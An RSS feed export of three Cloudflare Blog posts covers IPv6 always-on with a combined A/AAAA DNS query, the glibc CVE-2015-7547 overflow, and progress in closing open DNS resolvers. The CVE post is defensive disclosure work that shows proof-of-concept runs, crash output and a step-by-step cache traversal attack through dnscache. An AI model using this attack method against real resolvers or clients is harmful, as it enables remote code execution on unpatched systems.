
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Wed, 15 Apr 2026 21:12:26 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Less Is More - Why The IPv6 Switch Is Missing]]></title>
            <link>https://blog.cloudflare.com/always-on-ipv6/</link>
            <pubDate>Thu, 25 May 2017 17:30:00 GMT</pubDate>
            <description><![CDATA[ At Cloudflare we believe in being good to the Internet and good to our customers. By moving on from the legacy world of IPv4-only to the modern-day world where IPv4 and IPv6 are treated equally, we believe we are doing exactly that. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare we believe in being good to the Internet and good to our customers. By moving on from the legacy world of IPv4-only to the modern-day world where IPv4 and IPv6 are treated equally, we believe we are doing exactly that.</p><p><i>"No matter what happens in life, be good to people. Being good to people is a wonderful legacy to leave behind."</i> - Taylor Swift (whose website has been IPv6 enabled for many many years)</p><p>Starting today with free domains, IPv6 is no longer something you can toggle on and off, it’s always just on.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6UqOfN1xF7mt0PpJ1BbVCy/2d645cfd651e7722c6c0790f039a0aa0/before-after-ipv6.png" />
            
            </figure>
    <div>
      <h3>How we got here</h3>
      <a href="#how-we-got-here">
        
      </a>
    </div>
    <p>Cloudflare has always been a gateway for visitors on IPv6 connections to access sites and applications hosted on legacy IPv4-only infrastructure. Connections to Cloudflare are terminated on either IP version and then proxied to the backend over whichever IP version the backend infrastructure can accept.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7w5o9faqmZFjQSgXnYIVIP/49472b8b1f3eebc0682f3d7fd67eb4fb/ipv4-ipv6-translation-gateway.png" />
            
            </figure><p>That means that a v6-only mobile phone (looking at you, T-Mobile users) can establish a clean path to any site or mobile app behind Cloudflare instead of doing an expensive 464XLAT protocol translation as part of the connection (shaving milliseconds and conserving very precious battery life).</p><p>That IPv6 gateway is set by a simple toggle that for a while now has been default-on. And to make up for the time lost before the toggle was default on, in August 2016 we went back retroactively and enabled IPv6 for those millions of domains that joined before IPv6 was the default. Over those next few months, we <a href="/98-percent-ipv6/">enabled IPv6 for nearly four million domains</a> –– you can see Cloudflare’s <a href="https://www.vyncke.org/ipv6status/plotsite.php?metric=w&amp;global=legacy&amp;pct=y">dent in the IPv6 universe</a> below –– and by the time we were done, 98.1% of all of our domains had IPv6 connectivity.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1yqnG0ahmUyEnfeUjLrqOi/083db64874e3322e8080e0c44183722e/plotsite.png" />
            
            </figure><p>As an interim step, we added an extra feature –– when you turn off IPv6 in our dashboard, we remind you just how archaic we think that is.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3oXyg84nb4l00KrDpmbrez/e7828711f44a4cf0fe78d16277d912be/modal.png" />
            
            </figure><p>With close to 100% IPv6 enablement, it no longer makes sense to offer an IPv6 toggle. Instead, Cloudflare is offering IPv6 always on, with no off-switch. We’re starting with free domains, and over time we’ll change the toggle on the rest of Cloudflare paid-plan domains.</p>
    <div>
      <h3>The Future: How Cloudflare and OpenDNS are working together to make IPv6 even faster and more globally deployed</h3>
      <a href="#the-future-how-cloudflare-and-opendns-are-working-together-to-make-ipv6-even-faster-and-more-globally-deployed">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6NjiPMVo4MsctGZW2P7RvI/b9dc657c93e35a5f7955b1378f1da61c/logos.png" />
            
            </figure><p>In November <a href="/98-percent-ipv6/">we published stats about the IPv6 usage</a> we see on the Cloudflare network in an attempt to answer who and what is pushing IPv6. The top operating systems by percent IPv6 traffic are iOS, ChromeOS, and MacOS respectively. These operating systems push significantly more IPv6 traffic than their peers because they use a routing choice algorithm called Happy Eyeballs. Happy Eyeballs opportunistically chooses IPv6 when available by doing two <a href="https://www.cloudflare.com/learning/dns/what-is-dns/">DNS</a> lookups –– one for an IPv6 address (this IPv6 address is stored in the DNS AAAA record - pronounced quad-A) and then one for the IPv4 address (stored in the DNS A record). Both DNS queries are flying over the Internet at the same time and the client chooses the address that comes back first. The client even gives IPv6 a few milliseconds head start (iOS and MacOS give IPv6 lookups a 25ms head start for example) so that IPv6 may be chosen more often. This works and has fueled some of IPv6’s growth. But it has fallen short of the goal of a 100% IPv6 world.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/27vp45uqt2lIMVqjzndv86/f6136dbc91d329894a131433df044bfb/A-AAAA.png" />
            
            </figure><p>While there are perfectly good historical reasons why IPv6 and IPv4 addresses are stored in separate DNS types, today clients are IP version agnostic and it no longer makes sense for it to require two separate round trips to learn what addresses are available to fetch a resource from.</p><p>Alongside OpenDNS, we are testing a new idea - what if you could ask for all the addresses in just one DNS query?</p><p>With OpenDNS, we are prototyping and testing just that –– a new DNS metatype that returns all available addresses in one DNS answer –– A records and AAAA records in one response. (A metatype is a query type in DNS that end users can’t add into their DNS zone file, it’s assembled dynamically by the authoritative nameserver.)</p><p>What this means is that in the future if a client like an iPhone wants to access a mobile app that uses Cloudflare DNS or using another DNS provider that supports the spec, the iPhone DNS client would only need to do one DNS lookup to find where the app’s API server is located, cutting the number of necessary round trips in half.</p><p>This reduces the amount of bandwidth on the DNS system, and pre-populates global DNS caches with IPv6 addresses, making IPv6 lookups faster in the future, with the side benefit that Happy Eyeballs clients prefer IPv6 when they can get the address quickly, which increases the amount of IPv6 traffic that flows through the Internet.</p><p>We have the metaquery working in code with the reserved TYPE65535 querytype. You can ask a Cloudflare nameserver for TYPE65535 of any domain on Cloudflare and get back all available addresses for that name.</p>
            <pre><code>$ dig cloudflare.com @ns1.cloudflare.com -t TYPE65535 +short
198.41.215.162
198.41.214.162
2400:cb00:2048:1::c629:d6a2
2400:cb00:2048:1::c629:d7a2
$</code></pre>
            <p>Did we mention Taylor Swift earlier?</p>
            <pre><code>$ dig taylorswift.com @ns1.cloudflare.com -t TYPE65535 +short
104.16.193.61
104.16.194.61
104.16.191.61
104.16.192.61
104.16.195.61
2400:cb00:2048:1::6810:c33d
2400:cb00:2048:1::6810:c13d
2400:cb00:2048:1::6810:bf3d
2400:cb00:2048:1::6810:c23d
2400:cb00:2048:1::6810:c03d
$</code></pre>
            <p>We believe in proving concepts in code and through the <a href="https://ietf.org/">IETF</a> standards process. We’re currently working on an experiment with OpenDNS and will translate our learnings to an Internet Draft we will submit to the IETF to become an RFC. We’re sure this is just the beginning to faster, better deployed IPv6.</p> ]]></content:encoded>
            <category><![CDATA[IPv4]]></category>
            <category><![CDATA[IPv6]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">6GuglMyL4s8AnqoL9NOliF</guid>
            <dc:creator>Dani Grant</dc:creator>
        </item>
        <item>
            <title><![CDATA[A tale of a DNS exploit: CVE-2015-7547]]></title>
            <link>https://blog.cloudflare.com/a-tale-of-a-dns-exploit-cve-2015-7547/</link>
            <pubDate>Mon, 29 Feb 2016 13:42:19 GMT</pubDate>
            <description><![CDATA[ A buffer overflow error in GNU libc DNS stub resolver code was announced last week as CVE-2015-7547. While it doesn't have any nickname yet (last year's Ghost was more catchy), it is potentially disastrous. ]]></description>
            <content:encoded><![CDATA[ <p><i>This post was written by Marek Vavruša and Jaime Cochran, who found out they were both independently working on the same glibc vulnerability attack vectors at 3am last Tuesday.</i></p><p>A buffer overflow error in GNU libc DNS stub resolver code was <a href="https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html">announced last week</a> as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547">CVE-2015-7547</a>. While it doesn't have any nickname yet (last year's <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235">Ghost</a> was more catchy), it is potentially disastrous as it affects any platform with recent GNU libc—CPEs, load balancers, servers and personal computers alike. The big question is: how exploitable is it in the real world?</p><p>It turns out that the only mitigation that works is patching. Please patch your systems <i>now</i>, then come back and read this blog post to understand why attempting to mitigate this attack by limiting DNS response sizes does not work.</p><p>But first, patch!</p>
    <div>
      <h3>On-Path Attacker</h3>
      <a href="#on-path-attacker">
        
      </a>
    </div>
    <p>Let's start with the <a href="https://github.com/fjserna/CVE-2015-7547">PoC from Google</a>, it uses the first attack vector described in the vulnerability announcement. First, a 2048-byte UDP response forces buffer allocation, then a failure response forces a retry, and finally the last two answers smash the stack.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo python poc.py &amp;
$ valgrind curl http://foo.bar.google.com
==17897== Invalid read of size 1
==17897==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==17897==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==17897==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==17897==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==17897==    by 0x4242424242424241: ???
==17897==  Address 0x4242424242424245 is not stack'd, malloc'd or (recently) free'd
Segmentation fault</code></pre>
            <p>This proof of concept requires attacker talking with glibc stub resolver code either directly or through a simple forwarder. This situation happens when your DNS traffic is intercepted or when you’re using an untrusted network.</p><p>One of the suggested mitigations in the announcement was to limit UDP response size to 2048 bytes, 1024 in case of TCP. Limiting UDP is, with all due respect, completely ineffective and only forces legitimate queries to retry over TCP. Limiting TCP answers is a plain protocol violation that cripples legitimate answers:</p>
            <pre><code>$ dig @b.gtld-servers.net +tcp +dnssec NS root-servers.net | grep "MSG SIZE"
;; MSG SIZE  rcvd: 1254</code></pre>
            <p>Regardless, let's see if response size clipping is effective at all. When calculating size limits, we have to take IP4 headers into account (20 octets), and also the UDP header overhead (8 octets), leading to a maximum allowed datagram size of 2076 octets. DNS/TCP may arrive fragmented—for the sake of argument, let's drop DNS/TCP altogether.</p>
            <pre><code>$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP
$ sudo iptables -I INPUT -p tcp --sport 53 -j DROP
$ valgrind curl http://foo.bar.google.com
curl: (6) Could not resolve host: foo.bar.google.com</code></pre>
            <p>Looks like we've mitigated the first attack method, albeit with collateral damage. But what about the UDP-only <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-udponly-py">proof of concept</a>?</p>
            <pre><code>$ echo "nameserver 127.0.0.10" | sudo tee /etc/resolv.conf
$ sudo python poc-udponly.py &amp;
$ valgrind curl http://foo.bar.google.com
==18293== Syscall param socketcall.recvfrom(buf) points to unaddressable byte(s)
==18293==    at 0x4F1E8C3: __recvfrom_nocancel (syscall-template.S:81)
==18293==    by 0x59FBFD0: send_dg (res_send.c:1259)
==18293==    by 0x59FBFD0: __libc_res_nsend (res_send.c:557)
==18293==    by 0x59F9C0B: __libc_res_nquery (res_query.c:227)
==18293==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18293==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18293==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18293==    by 0x4F08AA0: gaih_inet (getaddrinfo.c:862)
==18293==    by 0x4F0AC4C: getaddrinfo (getaddrinfo.c:2418)
==18293==  Address 0xfff001000 is not stack'd, malloc'd or (recently) free'd
*** Error in `curl': double free or corruption (out): 0x00007fe7331b2e00 ***
Aborted</code></pre>
            <p>While it's not possible to ship a whole attack payload in 2048 UDP response size, it still leads to memory corruption. When the announcement suggested blocking DNS UDP responses larger than 2048 bytes as a viable mitigation, it confused a <a href="https://blog.des.no/2016/02/freebsd-and-cve-2015-7547/">lot of people</a>, including other <a href="http://blog.powerdns.com/2016/02/17/powerdns-cve-2015-7547-possible-mitigation/">DNS vendors</a> and ourselves. This, and the following proof of concept show that it's not only futile, but harmful in long term if these rules are left enabled.</p><p>So far, the presented attacks required a MitM scenario, where the attacker talks to a glibc resolver directly. A "good enough" mitigation is to run a local caching resolver, to isolate glibc code from the attacker. In fact, doing so not only improves the Internet performance with a local cache, but also prevents past and possibly future security vulnerabilities.</p>
    <div>
      <h4>Is a caching stub resolver really good enough?</h4>
      <a href="#is-a-caching-stub-resolver-really-good-enough">
        
      </a>
    </div>
    <p>Unfortunately, no. A local stub resolver such as <a href="http://www.thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> alone is not sufficient to defuse this attack. It's easy to traverse, as it doesn't scrub upstream answers—let's see if the attack goes through with a <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-dnsmasq-py">modified proof of concept</a> that uses only well-formed answers and zero time-to-live (TTL) for cache traversal.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo dnsmasq -d -a 127.0.0.1 -R -S 127.0.0.10 -z &amp;
$ sudo python poc-dnsmasq.py &amp;
$ valgrind curl http://foo.bar.google.com
==20866== Invalid read of size 1
==20866==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==20866==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==20866==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==20866==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==20866==    by 0x1C000CC04D4D4D4C: ???
Killed</code></pre>
            <p>The big question is—now that we've seen that the mitigation strategies for MitM attacks are provably ineffective, can we exploit the flaw off-path through a caching DNS resolver?</p>
    <div>
      <h3>An off-path attack scenario</h3>
      <a href="#an-off-path-attack-scenario">
        
      </a>
    </div>
    <p>Let's start with the first phase of the attack—a compliant resolver is never going to give out a response larger than 512 bytes over UDP to a client that doesn't support EDNS0. Since the glibc resolver doesn't do that by default, we have to escalate to TCP and perform the whole attack there. Also, the client should have at least two nameservers, otherwise it complicates a successful attack.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo iptables -F INPUT
$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP</code></pre>
            <p>Let's try it with a <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-tcponly-py">proof of concept</a> that merges both the DNS proxy and the attacker.</p><ol><li><p>The DNS proxy on localhost is going to ask the attacker both queries over UDP, and the attacker responds with a TC flag to force client to retry over TCP.</p></li><li><p>The attacker responds once with a TCP response of 2049 bytes or longer, then forces the proxy to close the TCP connection to glibc resolver code. <i>This is a critical step with no reliable way to achieve that.</i></p></li><li><p>The attacker sends back a full attack payload, which the proxy happily forwards to the glibc resolver client.</p></li></ol>
            <pre><code>$ sudo python poc-tcponly.py &amp;
$ valgrind curl http://foo.bar.google.com
==18497== Invalid read of size 1
==18497==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==18497==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18497==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18497==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18497==    by 0x1C000CC04D4D4D4C: ???
==18497==  Address 0x1000000000000103 is not stack'd, malloc'd or (recently) free'd
Killed</code></pre>
            
    <div>
      <h3>Performing the attack over a real resolver</h3>
      <a href="#performing-the-attack-over-a-real-resolver">
        
      </a>
    </div>
    <p>The key factor to a real world non-MitM cache resolver attack is to control the messages between the resolver and the client indirectly. We came to the conclusion that djbdns’ dnscache was the best target for attempting to illustrate an actual cache traversal.</p><p>In order to fend off DoS attack vectors like <a href="https://en.wikipedia.org/wiki/Slowloris_(computer_security)">slowloris</a>, which makes numerous simultaneous TCP connections and holds them open to clog up a service, DNS resolvers have a finite pool of parallel TCP connections. This is usually achieved by limiting these parallel TCP connections and closing the oldest or least-recently active one. For example—djbdns (dnscache) holds up to 20 parallel TCP connections, then starts dropping them, starting from the oldest one. Knowing this, we realised that we were able to terminate TCP connections with ease. Thus, one security fix becomes another bug’s treasure.</p><p>In order to exploit this, the attacker can send a truncated UDP A+AAAA query, which triggers the necessary retry over TCP. The attacker responds with a valid answer with a TTL of 0 and dnscache sends the glibc client a truncated UDP response. At this point, the glibc function <code>send_vc()</code> retries with dnscache over TCP and since the previous answer's TTL was 0, dnscache asks the attacker’s server for the A+AAAA query again. The attacker responds to the A query with an answer larger than 2000 to induce glibc's buffer mismanagement, and dnscache then forwards it to the client. Now the attacker can either wait out the AAAA query while other clients are making perfectly legitimate requests or instead make 20 TCP connections back to dnscache, until dnscache terminates the attacker's connection.</p><p>Now that we’ve met all the conditions to trigger another retry, the attacker sends back any valid A response and a valid, oversized AAAA that carries the payload (either in CNAME or AAAA RDATA), dnscache tosses this back to the client, triggering the overflow.</p><p>It seems like a complicated process, but it really is not. Let’s have a look at our <a href="https://gist.github.com/vavrusa/689b48d2d6c16759fc85">proof-of-concept</a>:</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo python poc-dnscache.py
[TCP] Sending back first big answer with TTL=0
[TCP] Sending back second big answer with TTL=0
[TCP] Preparing the attack with an answer &gt;2k
[TCP] Connecting back to caller to force it close original connection('127.0.0.1', 53)
[TCP] Original connection was terminated, expecting to see requery...
[TCP] Sending back a valid answer in A
[TCP] Sending back attack payload in AAAA</code></pre>
            <p>Client:</p>
            <pre><code>$ valgrind curl https://www.cloudflare.com/
==6025== Process terminating with default action of signal 11 (SIGSEGV)
==6025==  General Protection Fault
==6025==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==6025==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==6025==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==6025==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==6025==    by 0x1C000CC04D4D4D4C: ???
Killed</code></pre>
            <p>This PoC was made to simply illustrate that it’s not only probable, but possible that a <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">remote code execution</a> via DNS resolver cache traversal can and may be happening. So, patch. Now.</p><p>We reached out to <a href="https://www.opendns.com">OpenDNS</a>, knowing they had used djbdns as part of their codebase. They investigated and verified this particular attack does not affect their resolvers.</p>
    <div>
      <h4>How accidental defenses saved the day</h4>
      <a href="#how-accidental-defenses-saved-the-day">
        
      </a>
    </div>
    <p>Dan Kaminsky wrote <a href="http://dankaminsky.com/2016/02/20/skeleton/">a thoughtful blog post</a> about scoping this issue. He argues:</p><blockquote><p>I’m just going to state outright: Nobody has gotten this glibc flaw to workthrough caches yet. So we just don’t know if that’s possible. Actualexploit chains are subject to what I call the MacGyver effect.</p></blockquote><p>Current resolvers scrub and sanitize final answers, so the attack payload must be encoded in a well-formed DNS answer to survive a pass through the resolver. In addition, only some record types are safely left intact—as the attack payload is carried in AAAA query, only AAAA records in the answer section are safe from being scrubbed, thus forcing the attacker to encode the payload in these. One way to circumvent this limitation is to use a CNAME record, where the attack payload may be encoded in a CNAME target (maximum of 255 octets).</p><p>The only good mitigation is to run a DNS resolver on <i>localhost</i> where the attacker can't introduce resource exhaustion, or at least enforce minimum cache TTL to defuse the waiting game attack.</p>
    <div>
      <h3>Takeaway</h3>
      <a href="#takeaway">
        
      </a>
    </div>
    <p>You might think it's unlikely that you could become a MitM target, but the fact is that you <i>already are</i>. If you ever used a public Wi-Fi in an airport, hotel or maybe in a café, you may have noticed being redirected to a captcha portal for authentication purposes. This is a temporary <a href="https://www.cloudflare.com/learning/security/global-dns-hijacking-threat/">DNS hijacking</a> redirecting you to an internal portal until you agree with the terms and conditions. What's even worse is a permanent DNS interception that you don't notice until you look at the actual answers. This happens on a daily basis and takes only a single name lookup to trigger the flaw.</p><p>Neither DNSSEC nor independent public resolvers prevent it, as the attack happens between stub and the recursor on the <i>last mile</i>. The recent flaws highlight the fragility of not only legacy glibc code, but also stubs <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3484">in general</a>. DNS is deceptively complicated protocol and should be treated carefully. A generally good mitigation is to shield yourself with a local caching DNS resolver<a href="#resolvers"><sup>1</sup></a>, or at least a <a href="https://dnscrypt.org">DNSCrypt</a> tunnel. Arguably, there might be a vulnerability in the resolver as well, but it is contained to the daemon itself—not to everything using the C library (e.g., sudo).</p>
    <div>
      <h3>Are you affected?</h3>
      <a href="#are-you-affected">
        
      </a>
    </div>
    <p>If you're running GNU libc between 2.9 and 2.22 then yes. Below is an informative list of several major platforms affected.</p><p>Platform</p><p>Notice</p><p>Status</p><p>Debian</p><p><a href="https://security-tracker.debian.org/tracker/CVE-2015-7547">CVE-2015-7547</a></p><p>Patched packages available (squeeze and newer)</p><p>Ubuntu</p><p><a href="http://www.ubuntu.com/usn/usn-2900-1/">USN-2900-1</a></p><p>Patched packages available (14.04 and newer)</p><p>RHEL</p><p><a href="https://access.redhat.com/articles/2161461">KB2161461</a></p><p>Patched packages available (RHEL 6-7)</p><p>SUSE</p><p><a href="https://www.suse.com/support/update/announcement/2016/suse-su-20160472-1.html">SUSE-SU-2016:0472-1</a></p><p>Patched packages available (latest)</p><p>Network devices &amp; CPEs</p><p><a href="https://www.reddit.com/r/networking/comments/46jfjf/cve20157547_mega_thread/">Updated list of affected platforms</a></p><p>The toughest problem with this issue is the long tail of custom CPEs and IoT devices, which can't be really enumerated. Consult the manufacturer's website for vulnerability disclosure. Keep in mind that if your CPE is affected by remote code execution, its network cannot be treated as safe anymore.</p><p>If you're running OS X, iOS, Android or any BSD flavour<a href="#bsd-affected"><sup>2</sup></a>, you're not affected.</p><ul><li><p>[1] Take a look at <a href="https://www.unbound.net">Unbound</a>, <a href="https://www.powerdns.com/recursor.html">PowerDNS Recursor</a> or <a href="https://www.knot-resolver.cz">Knot DNS Resolver</a> for a compliant validating resolver.</p></li><li><p>[2] Applications running under Linux emulation and using glibc may be affected, make sure to update ports.</p></li></ul><p></p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Programming]]></category>
            <guid isPermaLink="false">1lupmQh30nM3wtSJrCOh95</guid>
            <dc:creator>Marek Vavruša</dc:creator>
            <dc:creator>Jaime Cochran</dc:creator>
        </item>
        <item>
            <title><![CDATA[Good Web Security News: Open DNS Resolvers Are Getting Closed]]></title>
            <link>https://blog.cloudflare.com/good-news-open-dns-resolvers-are-getting-clos/</link>
            <pubDate>Fri, 22 Feb 2013 21:12:00 GMT</pubDate>
            <description><![CDATA[ This has been a rough week in the security industry with big attacks and compromises reported at companies from Facebook to Apple.  ]]></description>
            <content:encoded><![CDATA[ <p></p><p>This has been a rough week in the security industry with big attacks and compromises reported at companies from Facebook to Apple. We're therefore happy to end the week with some good news: the web's open resolvers, one of the sources of the biggest DDoS attacks, are getting closed.</p>
    <div>
      <h3>Sad State of Affairs</h3>
      <a href="#sad-state-of-affairs">
        
      </a>
    </div>
    <p>Last October, we wrote a <a href="/deep-inside-a-dns-amplification-ddos-attack">blog post about DDoS amplification attacks</a>. This type of attack makes up some of the largest DDoSs CloudFlare sees, sometimes exceeding 100 gigabits per second (100Gbps). The attacks use DNS resolvers that haven't been properly secured in order to "amplify" the resources of the attacker. An attacker can achieve more than a 50x amplification, meaning that for every byte they are able to generate themselves they can pummel a victim with 50 bytes of garbage data.</p><p>The problem stems from misconfigured DNS resolver software (e.g., BIND) that is set up to respond to a query from any IP address. Since DNS requests typically are sent over UDP, which, unlike TCP, does not require a handshake, an attacker can spoof a victim's IP address as the source address in a packet and a misconfigured DNS resolver will happily bombard the victim with responses.</p>
    <div>
      <h3>Closing the Open Resolvers</h3>
      <a href="#closing-the-open-resolvers">
        
      </a>
    </div>
    <p>While CloudFlare's network is very good at absorbing even these large attacks, the long term solution for the web is for providers to clean up the open resolvers running on their networks. We wanted to help with that, so we engaged in a bit of name-and-shame at the end of the last blog post, listing the networks with the largest number of open resolvers. The good news is it worked: almost four months later our tests show that the number of open resolvers across the Internet is down more than 30%. The chart below shows the progress individual networks have made in cleaning up the problem.</p><table><tr><td><p><b>ASN</b></p></td><td><p><b>Network</b></p></td><td><p><b>10/30/12</b></p></td><td><p><b>2/22/13</b></p></td><td><p><b>% Change</b></p></td></tr><tr><td><p>21844 </p></td><td><p>THEPLANET-AS - ThePlanet.com Internet Services, In</p></td><td><p>2925</p></td><td><p>2216</p></td><td><p>-24%</p></td></tr><tr><td><p>3462 </p></td><td><p>HINET Data Communication Business Group</p></td><td><p>2739</p></td><td><p>2213</p></td><td><p>-19%</p></td></tr><tr><td><p>36351 </p></td><td><p>SOFTLAYER - SoftLayer Technologies Inc.</p></td><td><p>1075</p></td><td><p>781</p></td><td><p>-27%</p></td></tr><tr><td><p>9394 </p></td><td><p>CRNET CHINA RAILWAY Internet(CRNET)</p></td><td><p>1052</p></td><td><p>774</p></td><td><p>-26%</p></td></tr><tr><td><p>4713 </p></td><td><p>OCN NTT Communications Corporation</p></td><td><p>1044</p></td><td><p>722</p></td><td><p>-31%</p></td></tr><tr><td><p>45595 </p></td><td><p>PKTELECOM-AS-PK Pakistan Telecom Company Limited</p></td><td><p>1030</p></td><td><p>716</p></td><td><p>-30%</p></td></tr><tr><td><p>4134 </p></td><td><p>CHINANET-BACKBONE No.31,Jin-rong Street</p></td><td><p>970</p></td><td><p>705</p></td><td><p>-27%</p></td></tr><tr><td><p>33182 </p></td><td><p>DIMENOC - HostDime.com, Inc.</p></td><td><p>940</p></td><td><p>638</p></td><td><p>-32%</p></td></tr><tr><td><p>7018 </p></td><td><p>ATT-INTERNET4 - AT&amp;T Services, Inc.</p></td><td><p>934</p></td><td><p>624</p></td><td><p>-33%</p></td></tr><tr><td><p>24940 </p></td><td><p>HETZNER-AS Hetzner Online AG RZ</p></td><td><p>872</p></td><td><p>593</p></td><td><p>-32%</p></td></tr><tr><td><p>26496 </p></td><td><p>AS-26496-GO-DADDY-COM-LLC - GoDaddy.com, LLC</p></td><td><p>855</p></td><td><p>560</p></td><td><p>-35%</p></td></tr><tr><td><p>20773 </p></td><td><p>HOSTEUROPE-AS Host Europe GmbH</p></td><td><p>835</p></td><td><p>517</p></td><td><p>-38%</p></td></tr><tr><td><p>16276</p></td><td><p>OVH OVH Systems</p></td><td><p>803</p></td><td><p>511</p></td><td><p>-36%</p></td></tr><tr><td><p>13768 </p></td><td><p>PEER1 - Peer 1 Network Inc.</p></td><td><p>707</p></td><td><p>421</p></td><td><p>-40%</p></td></tr><tr><td><p>14383 </p></td><td><p>VCS-AS - Virtacore Systems Inc</p></td><td><p>596</p></td><td><p>420</p></td><td><p>-30%</p></td></tr><tr><td><p>32613 </p></td><td><p>IWEB-AS - iWeb Technologies Inc.</p></td><td><p>585</p></td><td><p>367</p></td><td><p>-37%</p></td></tr><tr><td><p>23352 </p></td><td><p>SERVERCENTRAL - Server Central Network</p></td><td><p>577</p></td><td><p>350</p></td><td><p>-39%</p></td></tr><tr><td><p>2514 </p></td><td><p>INFOSPHERE NTT PC Communications, Inc.</p></td><td><p>561</p></td><td><p>341</p></td><td><p>-39%</p></td></tr><tr><td><p>2519 </p></td><td><p>VECTANT VECTANT Ltd.</p></td><td><p>531</p></td><td><p>326</p></td><td><p>-39%</p></td></tr><tr><td><p>15003 </p></td><td><p>NOBIS-TECH - Nobis Technology Group, LLC</p></td><td><p>521</p></td><td><p>322</p></td><td><p>-38%</p></td></tr><tr><td><p>22773 </p></td><td><p>ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc</p></td><td><p>484</p></td><td><p>315</p></td><td><p>-35%</p></td></tr><tr><td><p>6830 </p></td><td><p>LGI-UPC UPC Broadband Holding B.V.</p></td><td><p>453</p></td><td><p>307</p></td><td><p>-32%</p></td></tr><tr><td><p>12322 </p></td><td><p>PROXAD Free SAS</p></td><td><p>449</p></td><td><p>299</p></td><td><p>-33%</p></td></tr><tr><td><p>21788 </p></td><td><p>NOC - Network Operations Center Inc.</p></td><td><p>442</p></td><td><p>295</p></td><td><p>-33%</p></td></tr><tr><td><p>17506 </p></td><td><p>UCOM UCOM Corp.</p></td><td><p>422</p></td><td><p>293</p></td><td><p>-31%</p></td></tr><tr><td><p>6939 </p></td><td><p>HURRICANE - Hurricane Electric, Inc.</p></td><td><p>414</p></td><td><p>284</p></td><td><p>-31%</p></td></tr><tr><td><p>16265</p></td><td><p>LEASEWEB LeaseWeb B.V.</p></td><td><p>407</p></td><td><p>284</p></td><td><p>-30%</p></td></tr><tr><td><p>3269 </p></td><td><p>ASN-IBSNAZ Telecom Italia S.p.a.</p></td><td><p>402</p></td><td><p>281</p></td><td><p>-30%</p></td></tr><tr><td><p>29550</p></td><td><p>SIMPLYTRANSIT Simply Transit Ltd</p></td><td><p>392</p></td><td><p>271</p></td><td><p>-31%</p></td></tr><tr><td><p>19262 </p></td><td><p>VZGNI-TRANSIT - Verizon Online LLC</p></td><td><p>390</p></td><td><p>262</p></td><td><p>-33%</p></td></tr></table>
    <div>
      <h3>Kudos</h3>
      <a href="#kudos">
        
      </a>
    </div>
